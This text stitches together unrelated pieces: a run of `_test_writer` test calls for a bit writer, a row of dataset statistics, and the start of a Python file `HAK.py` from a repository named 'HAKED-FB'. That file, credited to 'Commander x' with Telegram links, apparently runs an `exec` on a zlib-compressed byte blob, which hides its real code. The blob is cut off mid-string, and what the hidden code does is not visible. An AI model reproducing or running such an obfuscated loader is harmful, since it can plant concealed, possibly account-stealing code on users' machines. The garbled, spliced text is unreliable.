_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\xf8\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1)
_test_writer(b"\xf0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2)
_test_writer(b"\xe0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4)
_test_writer(b"\xc0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8)
_test_writer(b"\x80\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16)
_test_writer(b"\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -32)
_test_writer(b"\x00\xfe\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -64)
_test_writer(b"\x00\xfc\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -128)
_test_writer(b"\x00\xf8\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -256)
_test_writer(b"\x00\xf0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -512)
_test_writer(b"\x00\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1024)
_test_writer(b"\x00\xc0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2048)
_test_writer(b"\x00\x80\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4096)
_test_writer(b"\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8192)
_test_writer(b"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16384)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 32)
_test_writer(b"\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 64)
_test_writer(b"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 128)
_test_writer(b"\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 256)
_test_writer(b"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 512)
_test_writer(b"\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1024)
_test_writer(b"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2048)
_test_writer(b"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4096)
_test_writer(b"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8192)
_test_writer(b"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16384)
_test_writer(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, True, 0)
| 96.052491 | 106 | 0.674527 | 47,904 | 215,926 | 2.947228 | 0.00309 | 1.167455 | 1.609028 | 1.956511 | 0.99876 | 0.99876 | 0.99876 | 0.998222 | 0.997656 | 0.997656 | 0 | 0.371716 | 0.093444 | 215,926 | 2,247 | 107 | 96.095238 | 0.349534 | 0.001857 | 0 | 0 | 1 | 0.916629 | 0.598275 | 0.598275 | 0 | 1 | 0 | 0 | 0.001345 | 1 | 0.001793 | false | 0 | 0.000896 | 0 | 0.002689 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 |
be66468cb8281766fef3f8d48807d87a800eda04 | 143,661 | py | Python | HAK.py | Animous34/HAKED-FB | 91085252199241fa1ff3087ae3899cfe5c66c921 | [
"MIT"
] | null | null | null | HAK.py | Animous34/HAKED-FB | 91085252199241fa1ff3087ae3899cfe5c66c921 | [
"MIT"
] | null | null | null | HAK.py | Animous34/HAKED-FB | 91085252199241fa1ff3087ae3899cfe5c66c921 | [
"MIT"
] | null | null | null | # Encrypt By Commander x
# Github : https://github.com/Anonymous 34
# Telegram: https://t.me/SAUJF
#It is not good for your personality that everything in you is great except for your mind
exec((lambda _____, ______ : ______(eval((lambda ____,__,_ : ____.join([_(___) for ___ in __]))('',[95, 95, 105, 109, 112, 111, 114, 116, 95, 95, 40, 34, 122, 108, 105, 98, 34, 41, 46, 100, 101, 99, 111, 109, 112, 114, 101, 115, 115],chr))(_____),"<https://t.me/TT_RQ","exec"))(b'x\x9cd}\xe9Z\x15\xcb\xb6\xec\xff\xfd\x144\x8a\x80\x08Y}\xa5\r(\x88\xa8\xa0\xa2\x82\xa2\x94J\xb5\x80\xb4""\x88\xf0\xecwF\xc4(\\\xe7\xbb\xe7;\xae\xad0gU6\xa3\x8d\x119rth\xf1\xb0>\xb98>\x1d\x9a\xbf\x18z\xbf\xdb\x9c\x94C\x8b+\x8b\x7f\xfe\xfcothi\xf7t\xe7W5t\x7fh\xe7\xf4\xf4\xf8\xe7\xfd\x99\x99m\xfe`\xba>:\x98\xe1\'\xfb\x0f\xae\xb5\xfb\xed\xf6Iy\xf0\xef\x93\xa7\xd3\x07\xed\xcc\xda\xda\xb7wo\xff7\xfa\xe2th\xf7\xe7\xd0\xe1\xd1\xe9\xd0\xf6\xd1Q3\xd4\x1d\x9d\x0c]\x1c\xfd:\x19:nO~\x1e\x1d\x96\xfb\xbb\xa7\x17C\xa7;\xe5\xe9P{\xd6\x9e\\\x9c\xee\xec\x1en\x0f\xed\x1e\xe23\xf8\xde\xf6I\x8b_\x9d\xd7\xed`\x887\xdf=\xd8=l\xfe\xd7\x9e\xb7\xf5\xf8\xf8~yP5\xe5\xd07\xfc\xdf\x94\xfe\xe7\xdb`\xcc\xfa\xcbx{V\xee\xff\x9f\xcfL\xe1\xff\xed\xf7\xd3\xdf\x8fv\x0f\xc77\xbf\x8d\x0f\xfe>\xc1\x87\xe3\xbb\x83w\x7f\xfb\xf6ebb\xfc\xce\x9d\xa9M\x9fL\r\xe1O\xe0\xf8\x1f?\xf8O\x10\xe2?\x01\xfe\x13\xe3?\xa9>\x81?\xb1\x9b\x1a\x8a\xf0\xc3\x10\x9fq\xb9}\xcf\xe7\xfaq<\xf8R\x9c\xe2\x87\x0e\xff\x19\xfc\xcb\xfb\xfeY\xffytl\xbf\x0c\x82\x84\xff\xf92U\xef\x9c\x0c\xc6\xc3\x19ML\x8d<\xfc\xffWydj\x04\xab12\xf8Tu\xe7\xbc8\xf7uS\x9cW\xcd\xc5fq\xde$+\x83\xbff\x0f\x8b\xf3\xae\x1e\xfc\xe9\x06\x7f|q\x1e\xc4\xc5\xb9\xcb\x8b\xf3|\xf0\xa7\x0c\x87\x06\xdf\x18\xfc\xd0G\x1f\x06\xbf\xa9\x1f\x0f\xfe\x13\xe8\x8f\x1f|\xc5\x0f>\xe2\x06\x1f\xcf}vk\xf0\xaf\xc1\x83\xf3\xc1\xbf\x82\xfe!\xc1\x93\xc1;\x06\x1f\xad\xf1\xe4v\xf0\xf7j}\xf0\xc8j\xf0\xa9\x10?\xbc\xc48\x8a\xf36\xbb?\xf8\xd5\xe0\xd7\xf9\xe0cu\xa8\xbf\xe3\x19U9\xf8{\xb6\xa1\xaf4\xe9\xe0\x93\x83\x1f\xf8\xc1\xf3\xca\xc1\x9f\n/\x89\x8a\xf3\xac;\x1b<\x1c\x8fi\xfe\xee\x0c\xfe\x96\xfe\xd9\x19|\xbd\xc2D\xf8&|m\xf0\xc7\xf3\x7f\xaf\xf5\xd1\xae\xc4\'\xfe=\x0b\x1f\xe6\xcf#\x8d(\xaf\xfe\x0c>=\x98[7\xf8e\xe34"~\x08\xa3\xca\x06/\xee4\xdar\xf0\xf72=\xd3/\xf2hI\xd3\xec\xe2\xc12\xe7\x18\xeb\xe0#m=7\xf8\xce\xe0Y\xcd\xe0\x07\x01\x86\x96\x0c\xfeT\xdbX}\xbd\xa0\xea\xde\x0c>\xda\xce\xdd?\xc4\x03?|\xd4+|6\xa7A5X\x95\\+\x83\xd7`<\x9d\xad\x16\x06\xef\x07\x83n"\r\x1e\xffn\x1a\xfd\xbb\x89\xf0\x81\xfc\xc1\xa3\xc1k+,\xe6,&\x97\xeb_X\x01\xac\xa8\xc7p\x9b|\xf0\x99\x123\xc0\xbfR\xedW\x89)\x0e\xc6Q\xe3g\x98f\xf9\xef\x15\xf8L\x15>\xc2<f5\xc0\xa6\x1a\x8c\xb6\xc1\x96\xe0\xed\xe5\xe0\x1fu0\x98b\xe7\xb4\xa0\x18S5\xf8r\x90j\xe1\xb1\xb3]\x88=\x1b\xfcq\x90\xa7#\xfc\x02\x02QcK\x07\xdf\xc0l\xebo\x97\xb6L\xf8|\xa5\x81p\xde\x83\x7f\xb7\x91\x9e\xc3\x81\xe3\xb9\xa9\x96\x13\xdf\x86`t)\x86\x04\x11\x88\xb6\xf5[\xbc\xb9\xa9\x8ff$\x19e$\x91\xaf\xbb\xed1\x8d\x94\nPj\xd5\xf1\xdb\xbc_\xd9F\xab\xdcU\x9bz"\x86\xe12{\x15\xf6\x18\xebd\xbb\x89\xa9\xd6\x81\xa6\x8d}\xe4\x9fNk\x8b\xa1c\xb5\xaa\xee\xf7\xd1\xe015F\x91`\xb4\x0b\x83\xef\xe6\x1a\xb6K\xa5\x8d\xf8,w\xaa.\xee\x0c\xfeUk\x88\x90\xa8\x80C}\xf1\xef\x07u=\xd8\x85<\x98{\xe1\x02)\x1e\x96\x06{\x17\x04\xb3z(~\x88\x99\xf9\xf6.$r\xf0\x15\x8c\xd8c\xf1\x97_h\xf90\x0f\xbe;\xd7\xfe\xb7\xee\x9bm~\x02-\xb4\xefw\xcb\x18MWBCa\x1el\xb0\xf8\xc2\xe03\xa7\x9cZzn\x82\xdeJ\xfb\xf9\xc4\xd8\x968\xd62c\xe5|\xc2Q\xde\xb1\xed\xc3\xd8\x07\xaf\xa8\xb9\xf0ol\xdf!x\x83\xc7\xd4\xe5]\xad\xb2\xaf$8\xa5)SW\xefj\xc9=F\x18N\xaep\x81O\xa4!A\x82\x87\xb7\xc9\xba\xedP\xa5\x8d\x87\x88ie\x1b\x0e\xea\xce\xf3\xfew\x93\x18\xec\x87\xaf\xfc&7\xb3u3\x9a\x03\x84\x14\xaf\x80H8L\xe2?\x7f\xf9\xa6\xf5\xc5x\xf11\x17-^\xe0\xadx\xe0\xdb\xbf\x18\xfb\xac\xed\x99{\x83\xe5\xaa.\xf0\xd7\xb9/Z\x08\xc8Y\x1bP\xbc7m\xad\xbc\xd3\x82\xba\xec\xe3\xae\xe4\x0c\x1f\xd4l\'\xf0\xdd\x03[t\x8f\x1d{\xc3o]|\xc1p4\xed*\xd6\xfaB\xe2\xa8`\xa9\x86\x8b\xbf\x07\xf9\xdf}\xedD\xee\x86g\xbf\xd2f\x9f\x0c\xc6\xd7v\xfa}n\x12\x8d\xe7\x97fB\xeb`T\xb3\xab\xcd\xfaan\x10ql\x86\x83\xec5\x10~\x0c\x19\xe6\xa4\r\xf7$\xf1\x90&\x8c\xa3n\xae1\xb8i(B\xbeo\xc6)o\xa5Jx\x8e\xd6\n\x7f\xff(3\x07;\x8f\x1d\xa9S\xb3\xfb\xceT?\xfa\xf6K\x92B\x15\x85\x0cT\x7feQ\x07v\xa7\x985\x95\x88L\xbe\xdaG\xbd)=\x92\x90\xb4n\xda\x1f=\xc00\xb6s\x19\xe5<\xdf\xc3\xc4\xc7 \x15o/%\x93\xae\xfe*\xe1\x85(\xbaP\x1fl\xb3\x8fx\x1b\x9c\x11\x15\x12&\xd0\x07\xe9$\x97\xee\xe4\xfa\xbd\x94\xaeI\xde`\x0c\xc72\x95XtOi\xac\xda\xaf\xd8f|\xe0X\xcf\xad\xcbC\xb8\x95S\xdb\xf2Z:\x16\x98]\xe3\xb6\x95\x7f[\x9bP&\xef\xd1\xf1\xe3\xc9\xc4\x9ciI\xa6\xe5\xeb\xba\xfb\x1c\xd59\xd4\xbfiG1\xfb]\xedG\xee\xf8\xac\xd3\x87\xd7?4\xa4:\x9e\x86m]\x87A\xcc\x0e`\x94\xe1\x8d\xf2\xb7f\xe0\xea\x0b\xb8\xfc=\x8d\x15:\x937\x8f\xb4\x91\xf0\x80\xf4|\x90\x81zSf\xa5\xb5\xa8\xa1\x1e\xac\xc3\xc9u\xef\xd6\xb5gn\xb0\x7fA\xa6\x85\xa2M\xc4\x86\xfb{\x0f\xfe\x0e\x06P;I\x08\x1d4\\!\xfdc\x8e\x81\x9f\xdbt\xcd\x8af\xdd\xfdK\xc9C\xe9.M\xa43}\x1e\xbf\x86\x93mC\xf9\x15\xac6\x1e\n]\xf4\xffD\x04\xe3j\xaaQ\xb3\xec\xf8\\\xf5\xe1\xa7\xadkp\x1fK>\xb5\xe4z\xc9\x0c\xbe\xc8\x8b\xb9\xf0\xc7^\x05\xa9\xcd\x96\xa5\xffM\xfez\xf0\x1f\xaa\xfb\xe2/\x8b\x05\xf0c\xb8\x96\xac\xfbx\xa0\x15\xe3\x8f\x82I\xf9\xba\xaeB\xb0T\x8e?\xc4l t\xd5w\xa9\x11^PU\x16k\xb9=\xfa\x94y\ty\x19\x1eD\x92\x84\xaa{\xb7-\'\x0c\xed\xe0\\\xf2\x17_\xfe\xf9\xa3\x81\xa4\rk\xfe0-t2\xe69]\xfe\x17\xbb\xb9\xac\xb8\xad\xf1W\x12\xe2\x1c\xd3\xca~k\xad\xe85R\xd9\xd6\xdc6\xa9\xcdg\xcd\x8a\xd5\xc1;\x8d\x12\x1f\xab\x18\xefE\xd0\t\x18M\xfci\xf2EmWi^\x89\xe1\x97\x9b\xc7*>\x86@\x97\xc7r\x1b\xd4e\xbc\xa22\xeb\x12\x99\xdbw\xb4\xb4\x7f\x83s\x08#d\x14\xd1bT\x99\x01l`|\xa2\xb1I\x8c\x0f\xab\x13\xfe\xf9\xe7\x9a\x18\r\x05oz}\xb6\x10,\xd0\x12@\xe6Z\xf7\xe3\xef\xfe\xe7\xdc>\xed0\x0bs~\xb0\x8f\x81\x85\x83\x8c\x88\xf0\xf7\xe4\x81\x9c\x12lH\xee\xae\x9f\x0eF\xe4\x9cIw)\x05\x82\xe5\xc1j\xc0\xc8\xe5\xd1>E\xfc\xe4\xeb\x98\xc6\xc9\xb8"\x91\xb9\xaa\xaa\xa5\xb1\x9dW\x10\xcbDsv\xed\xa1v\x13~\x12\x11\x8d\xeb\xe66\xb0dc\xd2\xe0\x0e\xfb\x01/\x14\x84\xab\xb0\xb7\xf3\xcf\xb5\xaeUo\x18#\xb9"\xac\x9d\xb7\xc0\x98\x92\x03\xab\x87\x05p\xf5\xda\x98<qU?Y\xd7^\xfa\xe0\xeb\x13EK\x8d\xab\xccQ!\x96\x84\xb2u\x8c\xd0\xd7\x86#mt\x0ek\x00\xfd\x81\x88#\x96\xaa\xf3Y\xadj\x05K\x04c\x88\xf9a\x89\xf1z\xef.vGnk\xb7\xda\xaa\xfer?\xbdkF\xae\x91\x98V\xe1.\x85y\xfa\xf1\xd4\xe0[\xda\xf0\x93\xe5\x03l\xd0Px\xbe\xa9\xc1\xe3\xc5e<\x85-\xcc\xbeiu\xbd\xdf\xad\x97.\x18%\x1c*\x85p\x90\xc82^\xba\xc6\x7f\xcd\x9c\xbbmS\xfeT\xf9\tV\nC,M\x02+\xba\xa3u\xa4)\xf8\xc0\xfa\xf3\x9f\xda\xda&\xbc6)\xcf`\x8b\xcb\xe4\xb5\x1cU`A\r\x14\xa8\xc9G\xf1\x83sL\x0cb\xf7\xb9\x8f\r\xb5\xe8\xbe\xf9\xa3\xcf\xe5\xf5\xd6\xe8>\xcc"\x94}\x01K?\xf4\\/\xc4\x13a\xf7\xf0\xa2\xc6%\xb3\xdaA\x98\xe4\xb6>>\xdf\x85k\xfd\xb0%\xcbT\x9b\x99\x84\x95\xa8\xdc\'I\xd6 "\xbb\x03\x01\xcd\x06\xcb\xe4K=\xaf\xea\xc6v\x0fl\x12\x99|\x92\xd48\x94|\xc1\xdet\x16\xd90\x86\xc0w\xfc\x9eD\xbc\t\xd6o\xdb\x8e\xbb[\x88\x05\x7fKA:\xcaa\'\xf7K\xb7\x1b\xef/I\xe2\xb1\xd1\xf8\x02\xb5\x03F&[\xff\xfc^\xef\x84\xb3\xad\xd2\xdb\x1ak\x80\xe0<\xba7\xd4\xdb\xea\x8f\x9a\x0b\x82T\x17-\xef\xfc\xd1\xb3\xa1w-\x83\xa2Q\xa8\x82\xedb\xa5a\xba\xf4\n~`A\x13\xf5\xa6\x9e\xb4\xe9\xdd#\xdb\x9b\xf0d\xf3\x9f\x89k-\xfdar\x00\x0b\x1a\xad\xfd\xb3\xc3\\\x84\xc8R\x11g\xc1v\xf0=\xb9\xf9\xc4\t\xde\xf3]\xbb\x8b\xe5\xc7K\xa1\xe7X\xa8\xca\x99@`l\x14\x86\x04ya}\x8d\xa1\xcf.\xbf\xe5\x9ba\x12\x11\x98!T--\xdb\x80yd0\x83\xb5I\xfe`>[\x12\x82\x06q6l\x87wm\xd4\x8d\x99\x84\xc4C2\x995\xdds\xaa=\x0c\xa2\xcd\xb5\xa9\xe1\xe9\x8f&\xdb\x9d\xc5\xcdX\x90DI(\x82\x03lZ\x95-i\xfa\x0c\xe0\x99\xf1\xc2\xfd5\'\x92Gx\xa7\xc6#\xe0D|\xdb\xc1\xed\xa4?\x11\xd2\x84f:s\x97\\T\x9f-\xecJ\xe5\xf1\x11\xef\xf1w\xcd\xa5\xa5\xc4\xe9\xabk32\xb5\r\xbb\xbb>\xc3jB$V^\xed_*\x0e,\xb31\xa8\xe6\x98)\x8c%\x85\xb9\xe5\xa6\xcc9\xd2\xf8\x11v\xf4.d\xea\x91M\xb8\x99\x19\xd2\n\r\x82\x11\x8b\xa2\xf2\xf6tXbU%+{\x0f\xb1Z\x88`\xf1\x12\xe6!u\xbb\xfb~\x0f\x0b\xfdf_\xcb\x871\xe3\x13\\z\x84\x8c\xa5\x05\xf4A\xca\xc8\xefZ\xe3@\xe0\x0c|\xa2\xce,\xa1\x80\x90A\x9a\xa8\x97\x16Dt\xe5#!\x18\x10\xa9\xc1\x96?/N\xbfZ\xfe\x06\xfb\x98\xde~\x01o\x0f\xb5\xa9\x9b\x87\xd3X\x90\xfb\xdc\xfbC\xfaf$<]\xba)O\xe0\xa3\x97\xf2\x19\xb0\x9f\x8c\x8c\x02-d\xde\x1c\xbc\x87\xd4M~\xd6\xa2\xba\x88\t\nf\x02\xad\xf6\xb0\xf2u\xb2\'\xd9C\xf0\x8d\xf0\x08\xbfQ\xcc\xbdG{?\x8a@\x13aW6W\xea\xd1\xc4\x03RI\x02\xa6C\x87\x93\x9b.\xb5\x8a\x1d\\\xa7p\xb9\xad\x10\x84zs\x97x\x0f\xac\xaaO7z\xb1\xc1\xa8?<\xb1\xb0\x16c\xafB\xd9\x1d\x845u5bq\xb8\x8d|\x13B\xf3\xc6B\xfc*<Q\x84Q\xdb\x0b\x03\xf3\xcc\r=\x02<\xd8_<\xb0\xd2\xc7]\xb0<e\xd9i#\x01\xabK\xaa2s\xbf\x19\x89?\x8c\x0fV\x01\x01e\x03\x17\r/SW\xcfV\x95\x07Q\x82\xcb!i!v\x1e;H\xab\x92\x19\xd2\x93$\x1f\x14\x9a\x00&"T\x04Mb(\xd3\xcd\x11\\\x99\xd4p\xb0jM=\xa6D\x8c\xa1Q\x18\xeb\x1b\xbe\xfe{8"_\xce8\xc3\xbf\x85:\xceka\x83\xe4\xbbD\xa4\x8b\x16\xe1\x05\xd6\xe1;\xa7\x8a\x13\xa4\xf5%mk\xa8\xd1{\x7f-\xf5\x80\x18v\xee,x^\x9cL\x87\xb2RXR"\x15\xb9\x10\x9e\x96f\xfdB\xf6\x15\xdbHa\x88-\xf8I\xb6\xf9\xb6{\xf6\xdc\xd2\xf01\'\xdb\x8c\x8fU\xdd\x01va\xdc\xc4\xd0[\x94\x8bm\x80\x89F\x98\xe0\xf3\x87k\x96y{\t\xc3 1[\xd1~\xb8\xea~\x1f\xdbaI\xa3\xa9a\xad\xb6\xab\xe7-\xc5\x1b\xac\xd1\xe1\x1ed\x9f\xee\xb7\x19\x91\xad\xc1?\\\xbdsmF\x8d\xb6#\x95zV\xce\x12\x81\xd8L/ \x1e\x02/\xe1\xb1\x89\x9e\xe5\x93\xde\x86C\xa5\xcc$\xb5e\xfdT\x96\x8f\x80\xa2e\xa5L3SI\\k\xd2\xda\x94\x88\x8c\xf3\xb3\x8f\x18\xe7w\x0b=\x92H\x1b\xce\x98\xa8\x96\xbeT\xd5\xd6m\x8d\n\x06\x04\xf2m6\xff\xe4w\xac\x98)po\x95\xab\xd0k1\xe3\re\x9d\xca\xf8|\x18\xcfo\xf5\x80\xb2\xc4~\x84\xd3\x1a\xba\x8b\xc7\xf1\xe3\xbb\'\x9a\xbf7\xcc\xabF\xf0\xd0\xa6[\x96\xa9\x94\xa7\x84H\x0cL\xc4\xffz\xa6\xd4\xd3G\x08\xef\xb5TT\xd9N\xa19\xf6\x81\x999\xa6\x91\xeezE\x83\x14\x9dX\xf1O\xde\x1dk\xb7\xa1\x05\xbe\xfd\xad\xef44PU\xf8%\xd3\x9b|\xd6\'\xef\x88\xc1\xd2\x1d\xcd\xb0\xf6K\xcf\xcc4"\xe4\xf2\x1e\x18\x82\xdb3\x180\xd9\xde_\x99\x91_\x87\xa3\xec\x12\xe4\xd0\xd5\x95\xe6\x85\xc12|\xa6}\xcd,rp\xe6\x1a+\x0b@\xda-\xcb\x9f\xf9\x839\xed\x1f#\xaep\xc6\xc2\xf2l^\xb3n\xba_K\x10\xfeu\xbcdD\x02TY\xe6\x90\x13\x06F\x98\xe4\x9e\xc8k\xd1\xc24\x8f.\x81\x81U?\xa5qL\x1e\xaa\xad\'f\xde\x12\xa2\xb5\xb7\xc6\xb0\xe0u\xf3\xc6\xa4\xdf\x90/(\x9c\xeb\xd6\x9b\x17&JL\n\xa6\xa0P\xa5LwE\x80\x19@MX\x9a\xf7\xce\x93\x9d9\xd9!\xfc\x0b\xd9F^\x0e\xe3\x93\xcb\xc3\xfaN\x99\xce\xfdQ\xd4\xd8\xc6s/\xae\xb7\xa5\xa3\xada\x8a9C\xbc_\x90\xd5?\x16\x83E\xa7\x9fF\xb4\x8bx"\xfe\x97@c\xa0\xd7\xbbx\xb7\x91H"\xba\xc3BW\xbdCc\xf4>\xdb\xaf\xa0er\xd0\xf2\xf2Z\xd10\xa4\xae\xa9\x8f\xa04+C\x8aY\xba\x1c\xa1I\xb8)\xc9\x0fLG\x114V\xed\xfa\xf1\xc7\x05K\xa4\x9c\x16\xd7\x13Y\x1c{\x04[cAd\t)\xc6JqV\xe9\xbe\x95\x05\xaa}K\xa8\\(\x84!\x88\x8f`\\\x0e&\x8e\x154\x10\xd7\xf4\xca\x03+\xe6\x19~\xcb\x92\x8e\xfc\x1cv\xeb\xf5?\xec\x14AX\x9d\xc4\xe7\xb7\x9fC\xdd`\xb2\xea\xcdQ\xbd\x1e\xda\xcb(\x07:\n\x03\x88a"\xe0\xac\xa3gP\x98\x87\xe9\x1b\xb8\xbd\'\xf2\xfde>2+)-i\xca,\xd8-\xcd;\x84\xb2\x0cM\xf9U\x1bC\xe7\x0f\x18993\xab\xd0\x16\x85\xd6\x97\xd1d\x88\x1d\xcfwi\xa5\x0f\xa7\x16\xf5mb4\xb5\x16;7\x88\x10\xea\xe9\xba\x15\xbd\x16j\xe9LQ\xb0=\x8c?\xe2u\xcb\xb4\x0c\x19g&\xde\xcd\xf6\xc15\xfe\x93\x97\xe3\xda\xb3\xbc\xbdex7|\xbc\xcf\x91,\xfamy;\x9f\xbdlP\xee\xa8\x8f%$]\xfc\x00^\xb6\x9c\x84\xe1\xbd\xbb)y\xe7\x9f\xfa\x19l\xefs\x83\x88\xc2\x0b\xe8\xf3}\xe9\x01\x84\xb3\xca\x8f\xda\x072\x0f\xac\xd9T\xf2\x1ct\xe8\xf5\xa8\x05G\xddv\x0f\x91\xfe\x91er-\x12\x1c<\xa3\xec^=\x94\x19\xa51(\xa7M\x1b\xe0\xb0\xfd\xc2O<\xf15Vw\xcd\xd2\x94\xda\x82\x83x\xed\xc1\xbeLMe\xa9\r\x1cxm\xd9\xb3o\x87l\';\x9a\xb2\xca\x1cVt)\xeb^\xd7\x06\xa3\x11#\xca\x8a\xd3\x18\x12\x0b\xd5\xe2G*K\x13Q\xc2\xa2Yj\xd7\x1eC\xd6\xda\xb7V;\xa8\xb5\x1c\x1e.<\xeb6O\x977\x7fk0\xa5\x03\x82\x17\x9d\xed~\xc3\x0eWz\x0b\x8dk\xa4m\x805\x82\xfc9\x87\xb9\x05\x0f\x10t\\I|n\x90\x18\xf3\xe7\xde\xc3g\xbb\xde\x90\xd7\xe3\x16I\xe4ry\xf0\xf2u\xb4\x10Y:\x1b\xb4%\xc0\xaf2\xff\x17~\xb7V\xb4\xc0\x8a\x04\xe9\x87uE\x12A\xfdjQ\xee\x14\x90\x8f\xab%\xbf]\xb3e\xa0i5%En\xa9\xdc[\xd0\xecT\xc2\\f\xa3O\r\x9d\x80\xef\x88W\xcc\x1a\xa4\x92\\D=Ml\x8a\xe6\x9b/&\x8f\xa5\x05UX\xb0&\xba\x05\xfb\xf6q\xecv\xef\x7f^J\xb5]\xc7\\\xfe:X\x1f\x92\x84\x0cd\xef\x14.\xa3~\xae\x17p\xb7\xe2\xa7\x18\xda\xd6w%7\x18\x08s[\xc3\x1a\xb0\xa9e\xfbJ\xd9_\xd3L\x1a\x00RC\x17\xa9DX\xdf\xb4|\x05C\x06\x1f\x96\xed\x9bE\xaa\x11\x96\xaa\xe2h\xb8\'\n\x9b\x84CS\xbd\x8a LbbY\xeeK\xf7\xf2\xf0\x1c"\x8d\xf2g\xf5T2\xcc\xd0\xcav\xa0\xa2\xfd\xc5\x1c\xba\xd2 W 